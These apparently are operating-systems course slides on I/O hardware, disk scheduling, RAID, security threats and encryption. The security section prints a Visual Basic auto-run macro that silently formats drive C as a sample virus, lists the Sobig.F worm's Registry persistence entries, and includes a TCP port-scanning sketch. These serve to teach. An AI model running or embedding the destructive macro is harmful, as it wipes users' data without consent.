2. UNIT 5: UNDERSTANDING THE SYSTEM DESIGN PROCESS
I/O Hardware
Secondary Storage Structure
The Security Problem
3. I/O Hardware…
I/O devices can be roughly categorized as storage, communications, user-interface, and other.
Devices communicate with the computer via signals sent over wires or
through the air.
Devices connect with the computer via ports, e.g. a serial or parallel port.
A common set of wires connecting multiple devices is termed a bus.
Buses include rigid protocols for the types of messages that can be sent across
the bus and the procedures for resolving contention issues.
4. I/O Hardware…
Figure 13.1 below illustrates three of the four
bus types commonly found in a modern PC:
The PCI bus connects high-speed high-
bandwidth devices to the memory subsystem (
and the CPU. )
The expansion bus connects slower low-
bandwidth devices, which typically deliver data
one character at a time ( with buffering. )
The SCSI bus connects a number of SCSI devices
to a common SCSI controller.
A daisy-chain bus ( not shown ) connects a string
of devices to each other like beads on a chain,
with only one of the devices directly connected
to the host.
A typical PC bus structure
5. I/O Hardware…
One way of communicating with devices is
through registers associated with each port.
Registers may be one to four bytes in size, and
may typically include ( a subset of ) the
following four:
The data-in register is read by the host to get
input from the device.
The data-out register is written by the host to
send output.
The status register has bits read by the host to
ascertain the status of the device, such as idle,
ready for input, busy, error, transaction
complete, etc.
The control register has bits written by the host
to issue commands or to change settings of the
device such as parity checking, word length, or
full- versus half-duplex operation.
Figure 13.2 shows some of the most common
I/O port address ranges.
Device I/O port locations on PCs (partial)
6. I/O Hardware…
Another technique for communicating with devices is memory-mapped I/O.
In this case a certain portion of the processor's address space is mapped to the
device, and communications occur by reading and writing directly to/from those
memory areas.
Memory-mapped I/O is suitable for devices which must move large quantities of
data quickly, such as graphics cards.
Memory-mapped I/O can be used either instead of or more often in combination
with traditional registers. For example, graphics cards still use registers for
control information such as setting the video mode.
Memory-mapped I/O poses a protection problem if a process is allowed to
write directly to the address space used by a memory-mapped I/O device.
( Note: Memory-mapped I/O is not the same thing as direct memory access, DMA.
See section 13.2.3 below. )
7. Polling
One simple means of device handshaking involves polling:
The host repeatedly checks the busy bit on the device until it becomes clear.
The host writes a byte of data into the data-out register, and sets the write bit in the command
register ( in either order. )
The host sets the command ready bit in the command register to notify the device of the pending
command.
When the device controller sees the command-ready bit set, it first sets the busy bit.
Then the device controller reads the command register, sees the write bit set, reads the byte of data
from the data-out register, and outputs the byte of data.
The device controller then clears the error bit in the status register, the command-ready bit, and
finally clears the busy bit, signaling the completion of the operation.
Polling can be very fast and efficient, if both the device and the controller are fast and if there is
significant data to transfer. It becomes inefficient, however, if the host must wait a long time in the
busy loop waiting for the device, or if frequent checks need to be made for data that is infrequently
there.
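The handshake steps above can be sketched as a toy simulation. All register names, bit positions, and the `Device` class are illustrative assumptions, not any real controller's interface:

```python
# A toy simulation of the polling handshake described above.
# Register names and bit layout are illustrative, not any real device's.

BUSY, CMD_READY, WRITE, ERROR = 0x1, 0x2, 0x4, 0x8

class Device:
    def __init__(self):
        self.status = 0          # busy/error bits, read by the host
        self.command = 0         # command-ready/write bits, written by the host
        self.data_out = 0        # byte written by the host for output
        self.output = []         # what the "device" actually emitted

    def tick(self):
        """One controller step: service a pending command, if any."""
        if self.command & CMD_READY:
            self.status |= BUSY                    # controller sets busy first
            if self.command & WRITE:
                self.output.append(self.data_out)  # read data-out, output the byte
            self.status &= ~ERROR                  # clear the error bit,
            self.command &= ~CMD_READY             # then command-ready,
            self.status &= ~BUSY                   # and finally busy

def host_write_byte(dev, byte):
    while dev.status & BUSY:      # 1. poll the busy bit until clear
        dev.tick()
    dev.data_out = byte           # 2. place the byte in data-out
    dev.command |= WRITE          #    and set the write bit
    dev.command |= CMD_READY      # 3. notify the device
    dev.tick()                    # (simulated controller runs)
    while dev.status & BUSY:      # host busy-waits for completion
        dev.tick()

dev = Device()
for b in b"hi":
    host_write_byte(dev, b)
print(bytes(dev.output))  # b'hi'
```

The inefficiency described in the last bullet is visible in the two `while` loops: the host spins doing nothing useful until the busy bit clears.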
8. Interrupts
Interrupts allow devices to notify the CPU when they have data to transfer or when an operation is
complete, allowing the CPU to perform other duties when no I/O transfers need its immediate
attention.
The CPU has an interrupt-request line that is sensed after every instruction.
A device's controller raises an interrupt by asserting a signal on the interrupt request line.
The CPU then performs a state save, and transfers control to the interrupt handler routine at a fixed
address in memory. ( The CPU catches the interrupt and dispatches the interrupt handler. )
The interrupt handler determines the cause of the interrupt, performs the necessary processing,
performs a state restore, and executes a return-from-interrupt instruction to resume the
interrupted processing. ( The interrupt handler clears the interrupt by servicing the device. )
( Note that the state restored does not need to be the same state as the one that was saved when
the interrupt went off. See below for an example involving time-slicing. )
10. Interrupts…
The above description is adequate for simple interrupt-driven I/O, but there
are three needs in modern computing which complicate the picture:
The need to defer interrupt handling during critical processing,
The need to determine which interrupt handler to invoke, without having to
poll all devices to see which one needs attention, and
The need for multi-level interrupts, so the system can differentiate between
high- and low-priority interrupts for proper response.
11. Interrupts…
These issues are handled in modern computer architectures with interrupt-controller
hardware.
Most CPUs now have two interrupt-request lines: One that is non-maskable for critical error
conditions and one that is maskable, that the CPU can temporarily ignore during critical
processing.
The interrupt mechanism accepts an address, which is usually one of a small set of numbers
for an offset into a table called the interrupt vector. This table ( usually located at physical
address zero ? ) holds the addresses of routines prepared to process specific interrupts.
The number of possible interrupt handlers still exceeds the range of defined interrupt
numbers, so multiple handlers can be interrupt chained. Effectively the addresses held in the
interrupt vectors are the head pointers for linked-lists of interrupt handlers.
Figure 13.4 shows the Intel Pentium interrupt vector. Interrupts 0 to 31 are non-maskable and
reserved for serious hardware and other errors. Maskable interrupts, including normal device
I/O interrupts, begin at interrupt 32.
Modern interrupt hardware also supports interrupt priority levels, allowing systems to mask
off only lower-priority interrupts while servicing a high-priority interrupt, or conversely to
allow a high-priority signal to interrupt the processing of a low-priority one.
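The interrupt vector with chained handlers can be sketched as a dispatch table. The vector numbers, handler behavior, and `raise_interrupt` protocol are illustrative assumptions, not real hardware:

```python
# A sketch of an interrupt vector with chained handlers, as described above.
# Vector numbers and the handler convention are illustrative only.

interrupt_vector = {}   # vector number -> chain (linked list) of handlers

def register_handler(vec, handler):
    interrupt_vector.setdefault(vec, []).append(handler)

def raise_interrupt(vec, *args):
    """Walk the chain until one handler claims the interrupt."""
    for handler in interrupt_vector.get(vec, []):
        if handler(*args):       # handler returns True if it serviced it
            return True
    return False                 # spurious / unclaimed interrupt

# Two devices sharing vector 32 (the first maskable vector in the
# Pentium layout mentioned above):
log = []
register_handler(32, lambda dev: (log.append("disk"), True)[1] if dev == "disk" else False)
register_handler(32, lambda dev: (log.append("nic"), True)[1] if dev == "nic" else False)

raise_interrupt(32, "nic")
print(log)  # ['nic']
```

Each entry in the table plays the role of the "head pointer for a linked list of interrupt handlers" described above: handlers are tried in turn until one claims the interrupt.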
13. Interrupts…
At boot time the system determines which devices are present, and loads
the appropriate handler addresses into the interrupt table.
During operation, devices signal errors or the completion of commands via
interrupts.
Exceptions, such as dividing by zero, invalid memory accesses, or attempts
to access kernel mode instructions can be signaled via interrupts.
Time slicing and context switches can also be implemented using the
interrupt mechanism.
The scheduler sets a hardware timer before transferring control over to a
user process.
When the timer raises the interrupt request line, the CPU performs a state-
save, and transfers control over to the proper interrupt handler, which in
turn runs the scheduler.
The scheduler does a state-restore of a different process before resetting
the timer and issuing the return-from-interrupt instruction.
A similar example involves the paging system for virtual memory: a page
fault causes an interrupt, which in turn issues an I/O request and a context
switch as described above, moving the interrupted process into the wait
queue and selecting a different process to run. When the I/O request has
completed ( i.e. when the requested page has been loaded up into physical
memory ), then the device interrupts, and the interrupt handler moves the
process from the wait queue into the ready queue, ( or depending on
scheduling algorithms and policies, may go ahead and context switch it back
onto the CPU. )
System calls are implemented via software interrupts, a.k.a. traps. When a ( library )
program needs work performed in kernel mode, it sets command information and
possibly data addresses in certain registers, and then raises a software interrupt. ( E.g.
21 hex in DOS. ) The system does a state save and then calls on the proper interrupt
handler to process the request in kernel mode. Software interrupts generally have low
priority, as they are not as urgent as devices with limited buffering space.
Interrupts are also used to control kernel operations, and to schedule activities for
optimal performance. For example, the completion of a disk read operation involves two
interrupts:
A high-priority interrupt acknowledges the device completion, and issues the next disk
request so that the hardware does not sit idle.
A lower-priority interrupt transfers the data from the kernel memory space to the user
space, and then transfers the process from the waiting queue to the ready queue.
The Solaris OS uses a multi-threaded kernel and priority threads to assign different
threads to different interrupt handlers. This allows for the "simultaneous" handling of
multiple interrupts, and the assurance that high-priority interrupts will take precedence
over low-priority ones and over user processes.
14. Direct Memory Access
For devices that transfer large quantities of data ( such as disk controllers ), it is wasteful to tie
up the CPU transferring data in and out of registers one byte at a time.
Instead this work can be off-loaded to a special processor, known as the Direct Memory Access,
DMA, Controller.
The host issues a command to the DMA controller, indicating the location where the data is
located, the location where the data is to be transferred to, and the number of bytes of data to
transfer. The DMA controller handles the data transfer, and then interrupts the CPU when the
transfer is complete.
A simple DMA controller is a standard component in modern PCs, and many bus-mastering I/O
cards contain their own DMA hardware.
Handshaking between DMA controllers and their devices is accomplished through two wires called
the DMA-request and DMA-acknowledge wires.
15. Direct Memory Access…
While the DMA transfer is going on the CPU
does not have access to the PCI bus ( including
main memory ), but it does have access to its
internal registers and primary and secondary
caches.
DMA can be done in terms of either physical
addresses or virtual addresses that are
mapped to physical addresses. The latter
approach is known as Direct Virtual Memory
Access, DVMA, and allows direct data transfer
from one memory-mapped device to another
without using the main memory chips.
Direct DMA access by user processes can speed
up operations, but is generally forbidden by
modern systems for security and protection
reasons. ( I.e. DMA is a kernel-mode
operation. )
Figure 13.5 below illustrates the DMA process.
Step in a DMA transfer
19. Disk Structure
Disk drives are addressed as large 1-D arrays of logical
blocks, where the logical block is the smallest unit of
transfer
The 1-D array of logical blocks is mapped onto the sectors
of the disk sequentially
Sector 0 is the 1st sector of the 1st track on the outermost
cylinder
Mapping proceeds in order through that track, then the rest of the
tracks in that cylinder, and then through the rest of the cylinders
from outermost to innermost
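The mapping just described can be sketched for an idealized geometry (real drives hide zoned recording and remapped sectors behind the logical-block interface; the parameter values below are made up for illustration):

```python
# A sketch of the logical-block-to-(cylinder, track, sector) mapping
# described above, for an idealized fixed-geometry disk.

def lba_to_chs(lba, tracks_per_cyl, sectors_per_track):
    sectors_per_cyl = tracks_per_cyl * sectors_per_track
    cylinder = lba // sectors_per_cyl               # outermost cylinder is 0
    track = (lba % sectors_per_cyl) // sectors_per_track
    sector = lba % sectors_per_track
    return cylinder, track, sector

# Sector 0 is the 1st sector of the 1st track of the outermost cylinder:
print(lba_to_chs(0, tracks_per_cyl=2, sectors_per_track=8))   # (0, 0, 0)
# Block 17, with 2 tracks per cylinder and 8 sectors per track:
print(lba_to_chs(17, tracks_per_cyl=2, sectors_per_track=8))  # (1, 0, 1)
```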
21. Disk Scheduling
The OS is responsible for using hardware
efficiently -- for the disk drives, this means
having a fast access time and high disk I/O
bandwidth
Access time has two major components
1. Seek time: move the head to the destination
cylinder
2. Rotational Latency: time for disk to rotate the
desired sector to the disk head
22. Disk Architecture
( Figure labels: cylinder, track, sector, disk head; 3500-7000 rpm )
Seek time "seek to the cylinder" ~ 10^-2 second
Latency time "rotate to sector" = 0.5 x (60/6000) ~ 5x10^-3 second
Transmission time: transfer bytes into memory ~ 10^-4 second
( 1KB block size / (10MB/s) DMA rate )
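The back-of-the-envelope timings above can be checked in a few lines:

```python
# Reproducing the slide's order-of-magnitude access-time numbers.

rpm = 6000
seek_time = 1e-2                          # "seek to the cylinder" ~ 10^-2 s
rotational_latency = 0.5 * (60 / rpm)     # half a revolution on average
transfer_time = 1024 / (10 * 1024**2)     # 1 KB block at a 10 MB/s DMA rate

print(f"latency  {rotational_latency:.4f} s")   # 0.0050 s  (~5e-3)
print(f"transfer {transfer_time:.6f} s")        # ~1e-4 s
```

Note how the mechanical components (seek and rotation) dominate: together they are roughly two orders of magnitude larger than the transfer time, which is why scheduling to minimize head movement matters.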
23. Disk Scheduling
Minimize seek time; seek time ∝ seek distance
Disk bandwidth = total # of bytes transferred / (time from the 1st
request to completion of the last)
Some algorithms
1. First-Come-First-Served (FCFS)
2. Shortest-Seek-Time-First (SSTF)
3. SCAN (Elevator algorithm)
4. Circular-SCAN (C-SCAN)
5. C-LOOK (LOOK)
25. 1. First-Come-First-Served (FCFS)
Easy to program and intrinsically fair.
Ignores positional relationships among pending
requests.
Acceptable when the load on a disk is light and
requests are uniformly distributed. Not good for
medium and heavy loads.
26. 2. Shortest-Seek-Time-First (SSTF)
Select the request with minimum seek time from
the current head position.
A form of SJF scheduling
Better than FCFS in general.
It may cause starvation of some requests.
28. SSTF
It is not optimal.
Consider the servicing sequence (head starting at 53): 37, 14, 65, 67, 98, 122,
124, 183.
The total head movement is 208 tracks.
This is 28 tracks less than that of SSTF (236 tracks).
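The head-movement totals can be checked directly, assuming the classic textbook request queue (head at cylinder 53; requests 98, 183, 37, 122, 14, 124, 65, 67):

```python
# A sketch that totals head movement for a given servicing order.

def head_movement(start, order):
    total, pos = 0, start
    for cyl in order:
        total += abs(pos - cyl)
        pos = cyl
    return total

queue = [98, 183, 37, 122, 14, 124, 65, 67]

# SSTF from 53 services the nearest request each time:
# 65, 67, 37, 14, 98, 122, 124, 183
print(head_movement(53, [65, 67, 37, 14, 98, 122, 124, 183]))  # 236
# The better (non-SSTF) order on the slide:
print(head_movement(53, [37, 14, 65, 67, 98, 122, 124, 183]))  # 208
```

Both orders service the same queue; SSTF's greedy choice at each step is what leads it away from the globally better schedule.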
30. 3. SCAN (Elevator algorithm)
The disk arm starts at one end of the disk and moves
toward the other end, servicing requests until it gets to
the other end of the disk, where the head movement is
reversed and servicing continues.
Most disk scheduling strategies actually implemented are
based on SCAN.
Improves throughput and mean response time.
32. 3. SCAN (Elevator algorithm)
Eliminates much of the discrimination in SSTF and gives
much lower variance in response time.
The requests at the other end of the disk wait the longest time.
But the upper bound on head movement for servicing a disk request is just twice
the number of disk tracks.
33. 4. C-SCAN
A variant of SCAN which provides a more uniform wait time
than SCAN.
The head moves from one end of the disk to the other,
servicing requests as it goes. When it reaches the other end it
immediately returns to the beginning of the disk, without
servicing any requests on the return trip.
It has very small variance in response time; that is, it maintains
a more uniform wait-time distribution among the requests.
35. 5. C-LOOK
C-LOOK is a practical variant of C-SCAN.
The head is only moved as far as the last request in each direction;
when there are no requests in the current direction, the head
movement is reversed.
C-SCAN, by contrast, always moves the head from one end of the disk to the other.
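C-LOOK order generation can be sketched as follows (sweep direction and request values are illustrative assumptions):

```python
# A sketch of C-LOOK ordering, per the description above: service upward
# from the head position to the last request, then jump back to the lowest
# pending request and sweep upward again (no servicing during the jump).

def c_look(head, requests):
    up = sorted(r for r in requests if r >= head)    # current upward sweep
    low = sorted(r for r in requests if r < head)    # next sweep after the jump
    return up + low

print(c_look(53, [98, 183, 37, 122, 14, 124, 65, 67]))
# [65, 67, 98, 122, 124, 183, 14, 37]
```

Unlike C-SCAN, the head stops at 183 (the last request) rather than continuing to the end of the disk, and jumps back only as far as 14 (the lowest pending request).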
37. Selecting a Disk-Scheduling Algorithm
It is possible to develop an optimal algorithm but
the computation needed may not justify the
savings over SSTF or SCAN scheduling algorithms.
The SCAN and C-SCAN (or LOOK and C-LOOK)
algorithms are more appropriate for systems that
place a heavy load on the disk.
38. Selecting a Disk-Scheduling Algorithm
If the queue seldom has more than one outstanding
request, then all disk scheduling algorithms degenerate
to FCFS and thus are effectively equivalent.
Some disk controller manufacturers have moved disk
scheduling algorithms into the hardware itself.
The OS sends requests to the controller in FCFS order, and
the controller queues them and executes them in some more
optimal order.
39. Disk Management
Low-level formatting, or physical formatting --
Dividing a disk into sectors that the disk
controller can read and write.
To use a disk to hold files, the OS still needs to
record its own data structures on the disk.
Partition the disk into one or more groups of cylinders
Logical formatting for “making a file system”.
40. Swap-Space Management
Swap-space -- Virtual memory uses disk space as
an extension of main memory.
Goal: to provide best throughput for virtual-
memory system.
42. Swap-Space Use
Systems that implement swapping may use swap space to
hold the entire process image, including the code and
data segments. (Paging systems may simply store pages
that have been pushed out of main memory.)
Size of swap space: few MB to hundreds of MB
UNIX: multiple swap spaces, usually put on separate disks.
UNIX copies entire processes between contiguous disk
regions and memory.
43. Swap-Space Location
1. normal file system:
simply a large file within the file system
easy to implement, but inefficient due to the cost
of traversing the file-system data structure
2. separate disk partition (more common):
No file system or directory structure is placed on
this space.
A separate swap-space storage manager is used to
allocate and de-allocate the blocks (optimized for
speed, not storage utilization)
44. Swap-Space Management
BSD 4.3
Preallocation: allocates swap space when process starts;
holds text segment (the program) and data segment
kernel uses swap maps to track swap-space use
file system is consulted only once for each text segment;
pages from data segment are read in from the file system,
or created, and are written to swap space and paged back in
as needed.
45. Swap-Space Management
Solaris 2
allocates swap space only when a page is forced out of
physical memory, not when the virtual memory page is
first created (modern computer has larger main
memory)
47. Disk striping (interleaving)
A group of disks is treated as one storage unit.
Each data block is divided into several sub-blocks.
Each sub-block is stored on a separate disk.
This reduces disk block access time and can fully
utilize disk I/O bandwidth.
Performance improvement: All disks transfer their
subblocks in parallel
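The sub-block division can be sketched as a round-robin split; the byte-level interleave and 4-disk group below are illustrative assumptions, not any real controller's layout:

```python
# A sketch of dividing a data block into sub-blocks across a disk group,
# as described above (layout illustrative).

def stripe(block, n_disks):
    """Round-robin the block's bytes across n_disks sub-blocks."""
    return [block[i::n_disks] for i in range(n_disks)]

def unstripe(sub_blocks):
    """Reassemble the original block from the per-disk sub-blocks."""
    n = len(sub_blocks)
    out = bytearray(sum(len(s) for s in sub_blocks))
    for i, sub in enumerate(sub_blocks):
        out[i::n] = sub
    return bytes(out)

subs = stripe(b"ABCDEFGH", 4)
print(subs)             # [b'AE', b'BF', b'CG', b'DH']
print(unstripe(subs))   # b'ABCDEFGH'
```

Each sub-block lives on a different disk, so in hardware the four transfers above would proceed in parallel, which is the source of the bandwidth gain.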
48. RAID
RAID: Redundant Arrays of Inexpensive Disks
It improves performance (especially price
performance ratio) and reliability (with
duplication of data).
49. RAID Level 1
known as Mirroring or shadowing,
makes a duplicate of all data files onto a second disk.
50% disk space utilization
the simplest RAID organization.
51. RAID 3: Block Interleaved Parity
An extra block of parity data is written to a
separate disk.
Example
if there are 9 disks in the array then sector 0 of disks 1
to 8 have their parity computed and stored on disk 9.
The operation takes place at the bit level for each byte.
52. Block Interleaved Parity:
Data bits 1 0 1 0 1 1 1 1 -> parity bit 0
Truth table of XOR ( Input 1 = Disk 1, Input 2 = Disk 2, Output = Parity Disk ):
Input 1 | Input 2 | Output
   1    |    1    |   0
   1    |    0    |   1
   0    |    1    |   1
   0    |    0    |   0
53. Block Interleaved Parity
Disk 1 bits 1 0 1 0 ? 1 1 1 with parity 0 -> the missing bit is 1
( recovered by XOR-ing the surviving bits with the parity )
Truth table of XOR ( as above ):
Input 1 | Input 2 | Output
   1    |    1    |   0
   1    |    0    |   1
   0    |    1    |   1
   0    |    0    |   0
54. Block Interleaved Parity
If one disk crashes we can re-compute the original
data from the other data bits plus the parity.
It has been shown that with a RAID of 100
inexpensive disks and 10 parity disks the mean
time to data loss (MTDL) is 90 years.
MTDL of a standard large expensive disk is 2 or 3
years.
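The parity computation and recovery described above can be sketched on whole bytes (the data values are made up for illustration):

```python
# A sketch of XOR parity, matching the truth tables above: the parity is
# the XOR of the data, and a lost disk's contents are recovered by
# XOR-ing the surviving data with the parity.

from functools import reduce

def parity(values):
    return reduce(lambda a, b: a ^ b, values)

disks = [0b10101010, 0b11001100, 0b11110000]   # illustrative data bytes
p = parity(disks)                              # stored on the parity disk

# "Lose" disk 1 and rebuild it from the others plus the parity:
rebuilt = parity([disks[0], disks[2], p])
print(rebuilt == disks[1])  # True
```

The algebra behind the recovery is simply that XOR-ing a value with itself cancels it out: d0 ^ d2 ^ (d0 ^ d1 ^ d2) = d1.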
55. RAID 3
Utilization issue:
striping data across a minimum of two drives while using a third
drive to store each byte's parity bit: 2/3 disk utilization (3 disks)
Performance issue:
during writes, updating any single data subblock forces the
corresponding parity subblock to be recomputed and rewritten.
Can manage only one data transfer at a time per array (for
example, a single read or write)
56. RAID Level 5
Similar to RAID 3; all devices are used for data
storage, with parity bit recording distributed
across all drives.
RAID 5 provides the best combination of over-all
data availability and fault-tolerant protection.
57. RAID Info
Read the article about RAID on the course
webpage: SunExpert, March 1996, Vol. 7, No. 3,
"RAID: Wasted Days, Wasted Nights"
59. The Security Problem
System secure if resources used and accessed as intended
under all circumstances
Unachievable
Intruders (crackers) attempt to breach security
Threat is potential security violation
Attack is attempt to breach security
Attack can be accidental or malicious
Easier to protect against accidental than malicious misuse
60. What kinds of intruders are there?
Casual prying by nontechnical users
Curiosity
Snooping by insiders
Often motivated by curiosity or money
Determined attempt to make money
May not even be an insider
Commercial or military espionage
This is very big business!
61. Accidents cause problems, too…
Natural disasters
Fires
Earthquakes
Wars (is this really an “act of God”?)
Hardware or software error
CPU malfunction
Disk crash
Program bugs (hundreds of bugs found in the most recent Linux kernel)
Human errors
Data entry
Wrong tape mounted
rm * .o
62. Security Violation Categories
Breach of confidentiality
Unauthorized reading of data
Breach of integrity
Unauthorized modification of data
Breach of availability
Unauthorized destruction of data
Theft of service
Unauthorized use of resources
Denial of service (DOS)
Prevention of legitimate use
63. Security Violation Methods
Masquerading (breach authentication)
Pretending to be an authorized user to escalate privileges
Replay attack
As is or with message modification
Man-in-the-middle attack
Intruder sits in data flow, masquerading as sender to receiver and
vice versa
Session hijacking
Intercept an already-established session to bypass authentication
65. Security Measure Levels
Impossible to have absolute security, but make cost to
perpetrator sufficiently high to deter most intruders
Security must occur at four levels to be effective:
Physical
Data centers, servers, connected terminals
Human
Avoid social engineering, phishing, dumpster diving
Operating System
Protection mechanisms, debugging
Network
Intercepted communications, interruption, DOS
Security is as weak as the weakest link in the chain
But can too much security be a problem?
66. Program Threats
Many variations, many names
Trojan Horse
Code segment that misuses its environment
Exploits mechanisms for allowing programs written by users to be
executed by other users
Spyware, pop-up browser windows, covert channels
Up to 80% of spam delivered by spyware-infected systems
Trap Door
Specific user identifier or password that circumvents normal security
procedures
Could be included in a compiler
How to detect them?
Logic Bomb
Program that initiates a security incident under certain circumstances
67. Program Threats (Cont.)
Viruses
Code fragment embedded in legitimate program
Self-replicating, designed to infect other computers
Very specific to CPU architecture, operating system, applications
Usually borne via email or as a macro
Visual Basic Macro to reformat hard drive
Sub AutoOpen()
Dim oFS
Set oFS = CreateObject("Scripting.FileSystemObject")
vs = Shell("c:\command.com /k format c:", vbHide)
End Sub
68. Program Threats (Cont.)
Virus dropper inserts virus onto the system
Many categories of viruses, literally many thousands of viruses
File / parasitic
Boot / memory
Macro
Source code
Polymorphic to avoid having a virus signature
Encrypted
Stealth
Tunneling
Multipartite
Armored
70. System and Network Threats
Some systems “open” rather than secure by default
Reduce attack surface
But harder to use, more knowledge needed to administer
Network threats harder to detect, prevent
Protection systems weaker
More difficult to have a shared secret on which to base access
No physical limits once system attached to internet
Or on network with system attached to internet
Even determining location of connecting system difficult
IP address is only knowledge
71. System and Network Threats (Cont.)
Worms – use spawn mechanism; standalone program
Internet worm
Exploited UNIX networking features (remote access) and bugs in finger
and sendmail programs
Exploited trust-relationship mechanism used by rsh to access friendly
systems without use of password
Grappling hook program uploaded main worm program
99 lines of C code
Hooked system then uploaded main code, tried to attack connected
systems
Also tried to break into other users accounts on local system via
password guessing
If target system already infected, abort, except for every 7th time
73. System and Network Threats (Cont.)
Port scanning
Automated attempt to connect to a range of ports on one or a
range of IP addresses
Detection of answering service protocol
Detection of OS and version running on system
nmap scans all ports in a given IP range for a response
nessus has a database of protocols and bugs (and exploits) to
apply against a system
Frequently launched from zombie systems
To decrease trace-ability
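The connect-based scanning that tools like nmap automate can be sketched with a plain TCP `connect()` probe. This is a minimal sketch for teaching purposes only; the function name and the self-test against a locally bound listener are assumptions for the example:

```python
# A sketch of TCP connect() port probing, the basic building block of the
# port scanning described above. For illustration only; scan only hosts
# you are authorized to test.

import socket

def scan_ports(host, ports, timeout=0.2):
    """Try a TCP connect() to each port; return the ones that accept."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means connect succeeded
                open_ports.append(port)
    return open_ports

# Demo against a listener we control: bind an ephemeral local port.
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(("127.0.0.1", 0))
listener.listen(1)
port = listener.getsockname()[1]
print(scan_ports("127.0.0.1", [port]))  # reports the bound port as open
listener.close()
```

Real scanners add the service- and OS-fingerprinting steps listed above on top of this probe, by examining the banners and protocol behavior of whatever answers.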
74. System and Network Threats (Cont.)
Denial of Service
Overload the targeted computer preventing it from doing any
useful work
Distributed denial-of-service (DDOS) come from multiple sites at
once
Consider the start of the IP-connection handshake (SYN)
How many started-connections can the OS handle?
Consider traffic to a web site
How can you tell the difference between being a target and being really
popular?
Accidental – CS students writing bad fork() code
Purposeful – extortion, punishment
75. Sobig.F Worm
More modern example
Disguised as a photo uploaded to adult newsgroup via account
created with stolen credit card
Targeted Windows systems
Had own SMTP engine to mail itself as attachment to everyone in
infected system's address book
Disguised with innocuous subject lines, looking like it came from
someone known
Attachment was executable program that created
WINPPR32.EXE in default Windows system directory
Plus the Windows Registry entries:
[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"TrayX" = %windir%\winppr32.exe /sinc
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"TrayX" = %windir%\winppr32.exe /sinc
76. Cryptography as a Security Tool
Broadest security tool available
Internal to a given computer, source and destination of messages
can be known and protected
OS creates, manages, protects process IDs, communication ports
Source and destination of messages on network cannot be trusted
without cryptography
Local network – IP address?
Consider unauthorized host added
WAN / Internet – how to establish authenticity
Not via IP address
77. Cryptography
Means to constrain potential senders (sources) and / or
receivers (destinations) of messages
Based on secrets (keys)
Enables
Confirmation of source
Receipt only by certain destination
Trust relationship between sender and receiver
78. Encryption
Constrains the set of possible receivers of a message
Encryption algorithm consists of
Set K of keys
Set M of Messages
Set C of ciphertexts (encrypted messages)
A function E : K → (M → C). That is, for each k ∈ K, Ek is a function
for generating ciphertexts from messages
Both E and Ek for any k should be efficiently computable functions
A function D : K → (C → M). That is, for each k ∈ K, Dk is a
function for generating messages from ciphertexts
Both D and Dk for any k should be efficiently computable functions
79. Encryption (Cont.)
An encryption algorithm must provide this essential
property: Given a ciphertext c ∈ C, a computer can
compute m such that Ek(m) = c only if it possesses k
Thus, a computer holding k can decrypt ciphertexts to the
plaintexts used to produce them, but a computer not holding
k cannot decrypt ciphertexts
Since ciphertexts are generally exposed (for example, sent on
the network), it is important that it be infeasible to derive k
from the ciphertexts
80. Symmetric Encryption
Same key used to encrypt and decrypt
Therefore k must be kept secret
DES was most commonly used symmetric block-encryption algorithm (created by US
Govt)
Encrypts a block of data at a time
Keys too short so now considered insecure
Triple-DES considered more secure
Algorithm used 3 times using 2 or 3 keys
For example
2001 NIST adopted new block cipher - Advanced Encryption Standard (AES)
Keys of 128, 192, or 256 bits, works on 128 bit blocks
RC4 is most common symmetric stream cipher, but known to have vulnerabilities
Encrypts/decrypts a stream of bytes (i.e., wireless transmission)
Key is an input to a pseudo-random-bit generator
Generates an infinite keystream
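The stream-cipher structure just described can be sketched with RC4 itself, since its keystream generator is only a few lines. This is an educational sketch: as the slide notes, RC4 is known to be vulnerable and should not be used in new systems.

```python
# A sketch of the RC4 keystream generator mentioned above: the key seeds a
# 256-entry permutation (key scheduling), then the generator emits an
# endless pseudo-random byte stream that is XOR-ed with the data.
# For illustration only; RC4 is broken.

def rc4_keystream(key):
    S = list(range(256))
    j = 0
    for i in range(256):                  # key scheduling: seed the permutation
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:                           # generator: infinite keystream
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) % 256]

def rc4(key, data):
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)

ct = rc4(b"secret", b"attack at dawn")
print(rc4(b"secret", ct))  # b'attack at dawn'  (same key decrypts)
```

Because encryption is just XOR with the keystream, applying the cipher twice with the same key recovers the plaintext, which is why the same function serves for both directions.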
82. Asymmetric Encryption
Public-key encryption based on each user having two keys:
public key – published key used to encrypt data
private key – key known only to individual user used to decrypt
data
Must be an encryption scheme that can be made public
without making it easy to figure out the decryption scheme
Most common is RSA block cipher
Efficient algorithm for testing whether or not a number is prime
No efficient algorithm is known for finding the prime factors of a
number
83. Asymmetric Encryption (Cont.)
Formally, it is computationally infeasible to derive kd,N from
ke,N, and so ke need not be kept secret and can be widely
disseminated
ke is the public key
kd is the private key
N is the product of two large, randomly chosen prime numbers p
and q (for example, p and q are 512 bits each)
Encryption algorithm is E_ke,N(m) = m^ke mod N, where ke satisfies
ke·kd mod (p−1)(q−1) = 1
The decryption algorithm is then D_kd,N(c) = c^kd mod N
84. Asymmetric Encryption Example
For example, make p = 7 and q = 13
We then calculate N = 7∗13 = 91 and (p−1)(q−1) = 72
We next select ke relatively prime to 72 and < 72, yielding 5
Finally, we calculate kd such that ke·kd mod 72 = 1, yielding 29
We now have our keys
Public key, ke,N = 5, 91
Private key, kd,N = 29, 91
Encrypting the message 69 with the public key results in the
ciphertext 62
Ciphertext can be decoded with the private key
Public key can be distributed in cleartext to anyone who wants to
communicate with the holder of the public key
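The worked example above can be verified with Python's three-argument `pow`, which performs modular exponentiation:

```python
# Checking the slide's toy RSA example (p = 7, q = 13).

p, q = 7, 13
N = p * q                   # 91
phi = (p - 1) * (q - 1)     # 72
ke, kd = 5, 29              # ke * kd mod 72 == 1

assert (ke * kd) % phi == 1

m = 69
c = pow(m, ke, N)           # encrypt with the public key: m^ke mod N
print(c)                    # 62
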